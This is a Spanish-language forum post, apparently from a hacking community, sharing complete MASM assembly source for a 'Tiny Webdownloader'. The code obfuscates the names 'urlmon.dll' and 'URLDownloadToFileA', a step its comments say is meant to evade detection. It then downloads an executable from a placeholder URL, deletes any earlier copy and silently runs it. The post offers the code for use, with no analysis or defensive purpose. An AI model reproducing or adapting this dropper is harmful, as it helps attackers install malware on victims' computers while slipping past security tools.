Downloader MASM

Iniciado por ANTRAX, Junio 05, 2012, 04:42:49 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Junio 05, 2012, 04:42:49 PM Ultima modificación: Junio 03, 2013, 11:54:32 AM por Expermicid
Código: asm
;Tiny Webdownloader by Aphex
;Hides use of URLDownloadToFileA to foil TDS
;http://iamaphex.cjb.net
;[email protected]

.386
.model flat, stdcall
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib

.data
Url byte 'http://your.isp.goes.here/file.exe', 0
Exe byte '~.exe', 0
Scramble1 byte 'dll', 0
Scramble2 byte '.', 0
Scramble3 byte 'mon', 0
Scramble4 byte 'url', 0
Scramble5 byte 'A', 0
Scramble6 byte 'File', 0
Scramble7 byte 'To', 0
Scramble8 byte 'Download', 0
Scramble9 byte 'URL', 0

.data?
UrlMonDll byte 11 dup (?)
UrlDownload byte 19 dup (?)
UrlMon dword ?
UrlDownloadToFile dword ?

.code
_main:
;unscrambles urlmon.dll
invoke lstrcpyn, addr UrlMonDll, addr Scramble4, 4
invoke lstrcat, addr UrlMonDll, addr Scramble3
invoke lstrcat, addr UrlMonDll, addr Scramble2
invoke lstrcat, addr UrlMonDll, addr Scramble1

;unscrambles URLDownloadToFileA
invoke lstrcpyn, addr UrlDownload, addr Scramble9, 4
invoke lstrcat, addr UrlDownload, addr Scramble8
invoke lstrcat, addr UrlDownload, addr Scramble7
invoke lstrcat, addr UrlDownload, addr Scramble6
invoke lstrcat, addr UrlDownload, addr Scramble5

;loads urlmon.dll
invoke LoadLibrary, addr UrlMonDll
mov UrlMon, eax

;links URLDownloadToFileA dynamically
invoke GetProcAddress, UrlMon, addr UrlDownload
mov UrlDownloadToFile, eax

;delete previous version
invoke DeleteFile, addr Exe

;downloads the exe
push 0
push 0
push offset Exe
push offset Url
push 0
call UrlDownloadToFile

;runs the exe
invoke WinExec, addr Exe, 0

;exits
invoke ExitProcess, 0

end _main


By X-Ray Cat

Imprimir
Ir Arriba Páginas1
Acciones del Usuario